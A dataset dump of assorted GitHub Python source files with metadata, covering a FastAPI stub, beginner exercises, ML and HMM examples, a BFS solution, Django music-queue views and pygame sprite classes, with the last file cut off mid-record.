+{"seq_id": "31343415317", "text": "from fastapi import FastAPI\n\nfrom users.models import User\nfrom users.views import users_router\nfrom db import init_db\n\napp = FastAPI()\napp.include_router(users_router, prefix='/api', tags=['users'])\n\n\n# CORSHEADERS FOR FRONTEND\norigins = [\n\n]\n\n\n@app.on_event(\"startup\")\nasync def on_startup():\n await init_db()\n\n\n\n@app.get(\"/\")\nasync def main():\n return 123", "repo_name": "AnthonyRedGrave/PetProjectCourseHunter", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "fastapi.FastAPI", "line_number": 7, "usage_type": "call"}, {"api_name": "users.views.users_router", "line_number": 8, "usage_type": "argument"}, {"api_name": "db.init_db", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "39794975752", "text": "# Bài 1: Find Pair\n\nlistA = [3, 6, 7, 9, 11, 12] \nsum = int(input(\"Nhập vào tổng sum: \"))\nlist_result = []\n\nfor i in range(0,len(listA)-1):\n for j in range (i+1,len(listA)):\n if listA[i] + listA[j] == sum:\n my_set = (listA[i],listA[j])\n list_result.append(my_set)\n \nprint(\"Với tổng bằng {0} thì có số cặp thỏa mãn: {1}\".format(sum,list_result))\n\n#Bài 2: Unique value Dictionary\n\n############ Ví dụ 1 ########\n\nvalue_dict_1 = dict(Trang=38, Thu=38, Ngoc=27, Thanh=26, Yen=25, Hang=22, Thuy=22)\n\nvalue_list = []\n\nfor i in value_dict_1:\n value_list.append(value_dict_1[i])\n\nunique_value_dict = set(list(value_list))\nprint(unique_value_dict)\n\n############ Ví dụ 2 ########\n\nvalue_dict_2 = [{\"V\":\"S001\"}, {\"V\": \"S002\"}, {\"VI\": \"S001\"}, {\"VI\": \"S005\"}, {\"VII\":\"S005\"}, {\"V\":\"S009\"},{\"VIII\":\"S007\"}]\n\nvalue_list_2 = set()\n\nfor i in value_dict_2:\n value_list_2.update(list(i.values()))\n\nprint(value_list_2)\n\n\n#Bài 4: Đếm số\n\nmy_list = [10, 21, 21, 40, 40, 52, 52, 1, 1, 2, 2, 2, 2, 11, 11, 11, 11, 25, 24, 24, 60, 40]\nmy_dict = dict.fromkeys(my_list)\nlist_unique=list(my_dict)\n\nfor i in list_unique:\n my_dict[i] = my_list.count(i)\nprint(my_dict)\n\n\n# Bài 5: Print Star\n\n############ Ví dụ 1 ########\n\nn = int(input(\"Nhap vao so dong: \"))\n\nfor i in range(1,n+1):\n #print(i*'\\t*')\n print((n-i)*\"\\t\", i*'\\t*')\n\n\n############ Ví dụ 2 ########\n\nso_dong = int(input(\"Nhap vao so dong: \"))\n\nfor i in range(1,so_dong+1):\n #print(i*'\\t*')\n n = i*'*'\n if i == so_dong:\n print(i*'\\t*', end = '')\n break\n print((so_dong-i)*\"\\t\", i*'\\t*')\n\nfor i in range(so_dong, 0, -1):\n if(i == so_dong):\n print(i*'\\t*')\n continue\n print( (so_dong)*\"\\t\", i*'\\t*')\n\n\n#Bài 3: Đếm ngược tới Xmas sau thời gian second giây \n\nimport datetime\nimport time\n\nxmas = datetime.datetime(2021, 12, 25)\nsecond = int(input(\"Nhập vào số giây đếm ngược: \"))\n\nwhile True:\n \n today = datetime.datetime.now()\n dem_nguoc = xmas - today\n print(\"Countdown to Xmas 2021: \",dem_nguoc)\n time.sleep(second)", "repo_name": "hangdtt29/Python_Leaning", "sub_path": "Python_Basic/Cautrucdulieu_python_hw3.py", "file_name": "Cautrucdulieu_python_hw3.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "vi", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 95, "usage_type": "call"}]}
+{"seq_id": "32137933792", "text": "from sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ndef modeling(dataForModel: tuple, model: str = \"LogisticRegression\") -> tuple:\n \"\"\"Returns trained model and its accuracy score\n params:\n dataForModel: tuple\n Its length is 4, and its elements are X_train, X_valid, y_train, y_valid in order.\n model: str\n The name of machine learning model. In this notebook, LogisticRegression only.\n When unknown name are assigned, return None\n return: tuple<(machine learning model), tuple>\n The first element is trained model.\n The second element is dictionary which accuracy score of 'train' and 'valid' are in it.\n \"\"\"\n X_train, X_valid, y_train, y_valid = dataForModel\n\n if (model == \"LogisticRegression\"):\n model = LogisticRegression()\n else:\n return None\n\n model.fit(X_train, y_train)\n accuracy_train: float = accuracy_score(y_train, model.predict(X_train))\n accuracy_valid: float = accuracy_score(y_valid, model.predict(X_valid))\n\n return model, {\"accuracy_train\": accuracy_train, \"accuracy_valid\": accuracy_valid}\n ", "repo_name": "takahiroaoki/titanic", "sub_path": "modules/modeling.py", "file_name": "modeling.py", "file_ext": "py", "file_size_in_byte": 1191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "33677851016", "text": "from __future__ import division\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.ion()\nnp.random.seed(0)\n\nimport pyhsmm\nfrom pyhsmm.util.text import progprint_xrange\nfrom pyhsmm.util.stats import whiten, cov\n\nimport autoregressive.models as m\nimport autoregressive.distributions as d\n\n###################\n# generate data #\n###################\n\nAs = [0.99*np.hstack((-np.eye(2),2*np.eye(2))),\n 0.99*np.array([[np.cos(np.pi/6),-np.sin(np.pi/6)],[np.sin(np.pi/6),np.cos(np.pi/6)]]).dot(np.hstack((-np.eye(2),np.eye(2)))) + np.hstack((np.zeros((2,2)),np.eye(2))),\n 0.99*np.array([[np.cos(-np.pi/6),-np.sin(-np.pi/6)],[np.sin(-np.pi/6),np.cos(-np.pi/6)]]).dot(np.hstack((-np.eye(2),np.eye(2)))) + np.hstack((np.zeros((2,2)),np.eye(2)))]\n\ntruemodel = m.ARHSMM(\n alpha=2.,init_state_distn='uniform',\n obs_distns=[d.AutoRegression(A=A,sigma=np.eye(2)) for A in As],\n dur_distns=[pyhsmm.basic.distributions.PoissonDuration(alpha_0=3*50,beta_0=3)\n for state in range(len(As))],\n )\n\ndata, labels = truemodel.generate(1000)\ndata += np.random.normal(size=data.shape) # some extra noise\n\nfig, spa = plt.subplots(2,1)\nspa[0].plot(data[:,0],data[:,1],'bx-')\nspa[1].plot(data,'bx-')\nspa[1].set_xlim(0,data.shape[0])\nfig.suptitle('data')\n\ntruemodel.plot()\nplt.gcf().suptitle('truth')\n\n##################\n# create model #\n##################\n\nNmax = 25\naffine = True\nnlags = 2\nmodel = m.ARWeakLimitStickyHDPHMM(\n alpha=4.,gamma=4.,kappa=100.,\n init_state_distn='uniform',\n obs_distns=[\n d.AutoRegression(\n nu_0=2.5,\n S_0=2.5*np.eye(2),\n M_0=np.zeros((2,2*nlags+affine)),\n K_0=10*np.eye(2*nlags+affine),\n affine=affine)\n for state in range(Nmax)],\n )\n\nmodel.add_data(data)\n\n###############\n# inference #\n###############\n\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nfrom moviepy.editor import VideoClip\n\nfig = model.make_figure()\nplt.set_cmap('terrain')\nplot_slice = slice(0,300)\n\nmodel.plot(fig=fig,draw=False,plot_slice=plot_slice)\n\ndef make_frame_mpl(t):\n model.resample_model()\n model.plot(fig=fig,update=True,draw=False,plot_slice=plot_slice)\n plt.tight_layout()\n return mplfig_to_npimage(fig)\n\nanimation = VideoClip(make_frame_mpl, duration=10)\nanimation.write_videofile('gibbs.mp4',fps=30)\n\n", "repo_name": "mattjj/pyhsmm-autoregressive", "sub_path": "examples/animation.py", "file_name": "animation.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.ion", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 4, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "autoregressive.models.ARHSMM", "line_number": 22, "usage_type": "call"}, {"api_name": "autoregressive.models", "line_number": 22, "usage_type": "name"}, {"api_name": "autoregressive.distributions.AutoRegression", "line_number": 24, "usage_type": "call"}, {"api_name": "autoregressive.distributions", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 24, "usage_type": "call"}, {"api_name": "pyhsmm.basic.distributions.PoissonDuration", "line_number": 25, "usage_type": "call"}, {"api_name": "pyhsmm.basic", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "autoregressive.models.ARWeakLimitStickyHDPHMM", "line_number": 48, "usage_type": "call"}, {"api_name": "autoregressive.models", "line_number": 48, "usage_type": "name"}, {"api_name": "autoregressive.distributions.AutoRegression", "line_number": 52, "usage_type": "call"}, {"api_name": "autoregressive.distributions", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.eye", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.set_cmap", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "moviepy.video.io.bindings.mplfig_to_npimage", "line_number": 80, "usage_type": "call"}, {"api_name": "moviepy.editor.VideoClip", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "10783054060", "text": "import sys\ninput = sys.stdin.readline\nfrom collections import deque\nN = int(input())\ngraph = [[] for _ in range(N)]\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n a -= 1\n b -= 1\n graph[a].append(b)\n graph[b].append(a)\nbase = map(int, input().rstrip().split())\nbase = list(elem - 1 for elem in base)\norder = [0] * N\nfor i in range(N):\n order[base[i]] = i\nfor iter in range(N):\n graph[iter].sort(key = lambda x : order[x])\ncheck = [False] * N\nqueue = deque()\nbfs_order = []\nqueue.append(0)\ncheck[0] = True\nwhile queue:\n basis = queue.popleft()\n bfs_order.append(basis)\n for elem in graph[basis]:\n if not check[elem]:\n check[elem] = True\n queue.append(elem)\nans = True\nfor iter in range(N):\n if base[iter] != bfs_order[iter]:\n ans = False\n break\nprint(1 if ans else 0)", "repo_name": "entrekid/daily_algorithm", "sub_path": "2020/0421/16940.py", "file_name": "16940.py", "file_ext": "py", "file_size_in_byte": 852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stdin", "line_number": 2, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "43776511829", "text": "from django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom rest_framework.decorators import api_view, throttle_classes\nfrom rest_framework.throttling import AnonRateThrottle\n\nfrom tikplay.forms import YoutubeForm\nfrom tikplay.models import Song, Log\nfrom tikplay.youtube import get_id_from_url, get_video\nfrom tikplay.decorators import jsonp\nfrom tikplay.tikplayer import tikPlayer\nfrom tikplay.tasks import get_audio_url, pop\n\nimport json\nfrom requests import get\n# Create your views here.\n\n@api_view(['POST', 'GET'])\ndef add_song_view(request):\n\n if request.method == 'POST':\n form = YoutubeForm(request.POST)\n\n if form.is_valid():\n youtube_url = form.cleaned_data['youtube_url']\n video_id = get_id_from_url(youtube_url)\n video = get_video(video_id)\n\n print (video.title)\n\n try:\n latest = Song.objects.latest()\n position_count = latest.position+1\n except Song.DoesNotExist:\n position_count = 0\n\n\n\n song = Song(video_id=video.id,\n title=video.title,\n description=video.description,\n channel=video.channel,\n image=video.image,\n position=(position_count))\n\n log = Log(video_id=video.id,\n added_by=\"\")\n\n song.save()\n log.save()\n \n get_audio_url(song.id)\n \n if position_count == 0:\n tikPlayer.new()\n\n return HttpResponseRedirect('/')\n else:\n form = YoutubeForm()\n \n song_list = Song.objects.all()\n try:\n current_song = Song.objects.earliest()\n except:\n current_song = None\n return render(request, 'add_song.html', {'form': form, 'song_list': song_list, 'current_song': current_song, 'playing': tikPlayer.is_playing()})\n\n@api_view(['GET'])\n@jsonp\ndef get_history(request):\n output = serializers.serialize('json', Log.objects.all())\n return json.dumps(json.loads(output), indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef get_queue(request):\n output = serializers.serialize('json', Song.objects.all())\n return json.dumps(json.loads(output), indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef get_current(request):\n try:\n output = serializers.serialize('json', [Song.objects.earliest()])\n return json.dumps(json.loads(output), indent=4)\n except:\n return json.dumps(json.loads(\"[]\"), indent=4)\n\n\n@api_view(['GET'])\n@jsonp\ndef pop_current(request):\n\n nextSong = pop()\n\n if nextSong:\n output = serializers.serialize('json', [Song.objects.earliest()])\n tikPlayer.new()\n return json.dumps(json.loads(output), indent=4)\n else:\n tikPlayer.clear()\n return json.dumps(json.loads(\"[]\"), indent=4)\n\n\n@api_view(['GET'])\n@jsonp\ndef clear(request):\n Song.objects.all().delete()\n tikPlayer.clear()\n return json.dumps(json.loads(\"[]\"), indent=4)\n\nclass FiveTimesAnonPerMinute(AnonRateThrottle):\n rate = '5/minute'\n\n@api_view(['GET'])\n@throttle_classes([FiveTimesAnonPerMinute])\n@jsonp\ndef add_song(request):\n url = request.GET.get('url')\n video_id = request.GET.get('id')\n if url: \n try:\n video_id = get_id_from_url(url)\n except Exception as e:\n return json.dumps({\"error\": str(e)}, indent=4)\n\n \n if not video_id:\n return json.dumps({\"error\": \"Missing parameter\"}, indent=4)\n \n \n try:\n video = get_video(video_id)\n except Exception as e:\n return json.dumps({\"error\": str(e)}, indent=4)\n\n print (video.title)\n\n try:\n latest = Song.objects.latest()\n position_count = latest.position+1\n except Song.DoesNotExist:\n position_count = 0\n\n\n\n song = Song(video_id=video.id,\n title=video.title,\n description=video.description,\n channel=video.channel,\n image=video.image,\n position=(position_count))\n song.save()\n\n get_audio_url(song.id)\n \n if position_count == 0:\n tikPlayer.new()\n output = serializers.serialize('json', [song])\n return json.dumps(json.loads(output), indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef play(request):\n tikPlayer.play()\n return json.dumps({\"message\": \"OK\"}, indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef pause(request):\n tikPlayer.pause()\n return json.dumps({\"message\": \"OK\"}, indent=4)\n\n\n@api_view(['GET'])\n@jsonp\ndef toggleplay(request):\n if tikPlayer.is_playing():\n tikPlayer.pause()\n return json.dumps({\"message\": \"PAUSE\"}, indent=4)\n else:\n tikPlayer.play()\n return json.dumps({\"message\": \"PLAY\"}, indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef is_playing(request):\n if tikPlayer.is_playing():\n return json.dumps({\"message\": \"PLAYING\"}, indent=4)\n else:\n return json.dumps({\"message\": \"PAUSED\"}, indent=4)", "repo_name": "thyjukki/tik-guildroom-app", "sub_path": "guildroom/tikplay/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tikplay.forms.YoutubeForm", "line_number": 23, "usage_type": "call"}, {"api_name": "tikplay.youtube.get_id_from_url", "line_number": 27, "usage_type": "call"}, {"api_name": "tikplay.youtube.get_video", "line_number": 28, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects.latest", "line_number": 33, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 33, "usage_type": "name"}, {"api_name": "tikplay.models.Song.DoesNotExist", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 35, "usage_type": "name"}, {"api_name": "tikplay.models.Song", "line_number": 40, "usage_type": "call"}, {"api_name": "tikplay.models.Log", "line_number": 47, "usage_type": "call"}, {"api_name": "tikplay.tasks.get_audio_url", "line_number": 53, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.new", "line_number": 56, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 56, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "tikplay.forms.YoutubeForm", "line_number": 60, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects.all", "line_number": 62, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 62, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.earliest", "line_number": 64, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.is_playing", "line_number": 67, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 67, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 19, "usage_type": "call"}, {"api_name": "django.core.serializers.serialize", "line_number": 72, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 72, "usage_type": "name"}, {"api_name": "tikplay.models.Log.objects.all", "line_number": 72, "usage_type": "call"}, {"api_name": "tikplay.models.Log.objects", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tikplay.models.Log", "line_number": 72, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 69, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 70, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 78, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 78, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.all", "line_number": 78, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 78, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 79, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 79, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 75, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 76, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 85, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 85, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.earliest", "line_number": 85, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 85, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 88, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 88, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 81, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 82, "usage_type": "name"}, {"api_name": "tikplay.tasks.pop", "line_number": 95, "usage_type": "call"}, {"api_name": "django.core.serializers.serialize", "line_number": 98, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 98, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.earliest", "line_number": 98, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 98, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.new", "line_number": 99, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 99, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 100, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 100, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.clear", "line_number": 102, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 102, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 91, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 92, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.all", "line_number": 109, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 109, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.clear", "line_number": 110, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 106, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 107, "usage_type": "name"}, {"api_name": "rest_framework.throttling.AnonRateThrottle", "line_number": 113, "usage_type": "name"}, {"api_name": "tikplay.youtube.get_id_from_url", "line_number": 124, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 126, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 130, "usage_type": "call"}, {"api_name": "tikplay.youtube.get_video", "line_number": 134, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 136, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects.latest", "line_number": 141, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 141, "usage_type": "name"}, {"api_name": "tikplay.models.Song.DoesNotExist", "line_number": 143, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 143, "usage_type": "name"}, {"api_name": "tikplay.models.Song", "line_number": 148, "usage_type": "call"}, {"api_name": "tikplay.tasks.get_audio_url", "line_number": 156, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.new", "line_number": 159, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 159, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 160, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 160, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 161, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 161, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 116, "usage_type": "call"}, {"api_name": "rest_framework.decorators.throttle_classes", "line_number": 117, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 118, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.play", "line_number": 166, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 166, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 167, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 163, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 164, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.pause", "line_number": 172, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 172, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 169, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 170, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.is_playing", "line_number": 179, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 179, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.pause", "line_number": 180, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 180, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 181, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.play", "line_number": 183, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 183, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 176, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 177, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.is_playing", "line_number": 189, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 189, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 192, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 186, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 187, "usage_type": "name"}]}
+{"seq_id": "72839985368", "text": "import os\nfrom typing import Union\n\nimport pygame\nfrom pygame import Surface\nfrom pygame.event import EventType\nfrom pygame.surface import SurfaceType\nfrom PIL import Image as pilimg, ImageSequence\n\n\nclass Scene(object):\n\n def __init__(self, game, screen: Union[Surface, SurfaceType]):\n self.screen = screen\n self.game = game\n self.hovering_button = False\n self.objects = pygame.sprite.Group()\n\n def on_tick(self):\n pass\n\n def on_key_input(self, event: EventType):\n pass\n\n def on_milis(self, milis):\n pass\n\n def render_scene(self):\n pass\n\n def add_object_to_render(self, sprite):\n self.objects.add(sprite)\n\n def remove_object_to_render(self, sprite):\n self.objects.remove(sprite)\n\n def is_rendered(self, sprite):\n return sprite in self.objects\n\n @staticmethod\n def load_gif(filename):\n pil_image = pilimg.open(filename)\n frames = []\n for frame in ImageSequence.Iterator(pil_image):\n frame = frame.convert('RGBA')\n pygame_image = pygame.image.fromstring(\n frame.tobytes(), frame.size, frame.mode).convert_alpha()\n frames.append(pygame_image)\n return frames\n\n\nclass AnimatedImage(pygame.sprite.Sprite):\n def __init__(self, rect, images, speed):\n super().__init__()\n self.images = images\n self.image = self.images[0]\n self.rect = rect\n self.image_index = 0\n self.speed = speed\n self.current = 0\n\n def update(self, scene, events):\n self.current = self.current + 1\n if self.current != self.speed:\n return\n else:\n self.current = 0\n self.image_index += 1\n if self.image_index >= len(self.images):\n self.image_index = 0\n self.image = self.images[self.image_index]\n\n\nclass Text(pygame.sprite.Sprite):\n def __init__(self, text, position):\n super().__init__()\n self.image = text\n self.rect = text.get_rect(center=position)\n\n\nclass Rectangle(pygame.sprite.Sprite):\n def __init__(self, width, height, x, y, color):\n super().__init__()\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.image = pygame.Surface((width, height))\n self.rect = pygame.Rect(x, y, self.image.get_width(), self.image.get_height())\n self.color = color\n self.image.fill(color)\n\n def update(self, scene, events):\n self.image = pygame.Surface((self.width, self.height))\n self.image.fill(self.color)\n self.rect = pygame.Rect(self.x, self.y, self.image.get_width(), self.image.get_height())\n\n\nclass Image(pygame.sprite.Sprite):\n\n def __init__(self, image, rect):\n super().__init__()\n self.image = image\n self.rect = rect\n\n\nclass Button(pygame.sprite.Sprite):\n\n def __init__(self,\n rect=None,\n rect_color=None,\n rect_position=(0, 0),\n text=None,\n text_hovered=None,\n font=None,\n click_callback=None):\n super().__init__()\n self.rect = rect\n self.rect_color = rect_color\n self.rect_position = rect_position\n self.text = text\n self.text_hovered = text_hovered\n self.font = font\n\n if text is not None and rect is None:\n self.rect = text.get_rect(center=rect_position)\n\n self.original = self.text\n 